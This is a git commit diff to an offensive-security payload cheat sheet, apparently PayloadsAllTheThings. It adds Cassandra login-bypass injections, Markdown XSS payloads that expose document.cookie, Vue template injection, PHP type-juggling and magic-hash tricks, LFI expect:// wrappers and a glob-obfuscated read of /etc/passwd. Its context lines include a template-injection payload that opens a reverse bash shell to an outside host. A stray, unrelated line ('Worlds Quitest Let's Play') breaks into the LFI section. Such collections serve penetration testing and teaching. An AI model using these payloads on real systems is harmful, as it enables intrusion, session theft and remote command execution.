Cassandra SQL + XSS MD + PHP Type Juggling

2024-12-18 18:36:10 +00:00 · 2018-09-10 20:40:43 +02:00 · 2018-09-10 20:40:43 +02:00 · 2a080f82e6
commit 2a080f82e6
parent 90f4c3634e
10 changed files with 101 additions and 12 deletions
--- a/Traversal/README.md
+++ b/Traversal/README.md
@ -174,8 +174,8 @@ Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://ex
 ### Wrapper expect://

 ```powershell
-http://example.com/index.php?page=php:expect://id
-http://example.com/index.php?page=php:expect://ls
+http://example.com/index.php?page=expect://id
+http://example.com/index.php?page=expect://ls
 ```

 ### Wrapper input://
@ -245,7 +245,7 @@ http://example.com/index.php?page=path/to/uploaded/file.png
 In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf

 ## LFI to RCE via upload (race)
-
+Worlds Quitest Let's Play"
 * Upload a file and trigger a self-inclusion.
 * Repeat 1 a shitload of time to:
 * increase our odds of winning the race
--- a/type/README.md
+++ b/type/README.md
@ -1,6 +1,35 @@
 # PHP Juggling type and magic hashes

-## Exploit
+## Type Juggling
+
+True statements
+
+```php
+var_dump('0010e2' == '1e3');             # true
+var_dump('0xABCdef' == ' 0xABCdef');     # true PHP 5.0 / false PHP 7.0
+var_dump('0xABCdef' == '     0xABCdef'); # true PHP 5.0 / false PHP 7.0
+var_dump('0x01' == 1)                    # true PHP 5.0 / false PHP 7.0
+var_dump('0x1234Ab'       == '1193131');
+
+'123'  == 123
+'123a' == 123
+'abc'  == 0
+
+'' == 0 == false == NULL
+'' == 0       # true
+0  == false   # true
+false == NULL # true
+NULL == ''    # true
+```
+
+NULL statements
+
+```php
+var_dump(sha1([])); # NULL
+var_dump(md5([]));  # NULL
+```
+
+## Magic Hashes - Exploit

 ```php
 <?php
@ -8,9 +37,6 @@ var_dump(md5('240610708') == md5('QNKCDZO'));
 var_dump(md5('aabg7XSs')  == md5('aabC9RqS'));
 var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
 var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
-var_dump('0010e2'         == '1e3');
-var_dump('0x1234Ab'       == '1193131');
-var_dump('0xABCdef'       == '     0xABCdef');
 ?>
 ```

--- a/execution/README.md
+++ b/execution/README.md
@ -102,6 +102,8 @@ who$@ami
 Bypass blacklisted word with variable expansion

 ```powershell
+/???/??t /???/p??s??
+
 test=/ehhh/hmtc/pahhh/hmsswd
 cat ${test//hhh\/hm/}
 cat ${test//hh??hm/}
--- a/injection/Cassandra
+++ b/injection/Cassandra
@ -0,0 +1,37 @@
+# Cassandra Injection
+
+> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
+
+## Cassandra comment
+
+```sql
+/* Cassandra Comment */
+```
+
+## Cassandra - Login Bypass
+
+### Login Bypass 0
+
+```sql
+username: admin' ALLOW FILTERING; %00
+password: ANY
+```
+
+### Login Bypass 1
+
+```sql
+username: admin'/*
+password: */and pass>'
+```
+
+The injection would look like the following SQL query
+
+```sql
+SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
+```
+
+Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php)
+
+## Thanks to
+
+* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)
--- a/injection/MySQL
+++ b/injection/MySQL
@ -1,6 +1,6 @@
 # MYSQL Injection

-## MySQL 
+## MySQL

 ```sql
 # MYSQL Comment
--- a/injection/README.md
+++ b/injection/README.md
@ -1,6 +1,6 @@
 # SQL injection

-A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
+A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.

 ## Summary

@ -9,6 +9,7 @@ A SQL injection attack consists of insertion or "injection" of a SQL query via t
 * [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md)
 * [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/PostgreSQL%20Injection.md)
 * [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/SQLite%20Injection.md)
+* [CheatSheet Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/Cassandra%20Injection.md)
 * [Entry point detection](#entry-point-detection)
 * [DBMS Identification](#dbms-identification)
 * [SQL injection using SQLmap](#sql-injection-using-sqlmap)
--- a/injections/README.md
+++ b/injections/README.md
@ -201,15 +201,21 @@ Inject this template
 {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
 ```

-## AngularJS
+## Client Side Template Injection

-### AngularJS - Basic injection
+### AngularJS

 ```javascript
 $eval('1+1')
 {{1+1}}
 ```

+### Vue JS
+
+```javascript
+{{constructor.constructor('alert(1)')()}}
+```
+
 ## Thanks to

 * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
--- a/injections/serverside.png
+++ b/injections/serverside.png
--- a/injection/README.md
+++ b/injection/README.md
@ -6,7 +6,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
 - [Identify an XSS endpoint](#identify-an-xss-endpoint)
 - [XSS in HTML/Applications](#xss-in-htmlapplications)
 - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
- [XSS in files](#xss-in-files)
+- [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
 - [Polyglot XSS](#polyglot-xss)
 - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
 - [CSP Bypas](#csp-bypass)
@ -233,6 +233,15 @@ XSS in SVG (short)
 <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
 ```

+XSS in Markdown
+
+```csharp
+[a](javascript:prompt(document.cookie))
+[a](j a v a s c r i p t:prompt(document.cookie))
+[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
+[a](javascript:window.onerror=alert;throw%201)
+```
+
 XSS in SWF flash application

 ```powershell
@ -693,6 +702,8 @@ Exotic payloads

 ## CSP Bypass

+Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://blog.thomasorlita.cz/vulns/google-csp-evaluator/)
+
 ### Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27))

 //google.com/complete/search?client=chrome&jsonp=alert(1);
--- a/injection/XSS
+++ b/injection/XSS
@ -132,3 +132,9 @@ Angular 1.0.1 - 1.1.5
 ```javascript
 {{constructor.constructor('alert(1)')()}}
 ```
+
+Vue JS
+
+```javascript
+{{constructor.constructor('alert(1)')()}}
+```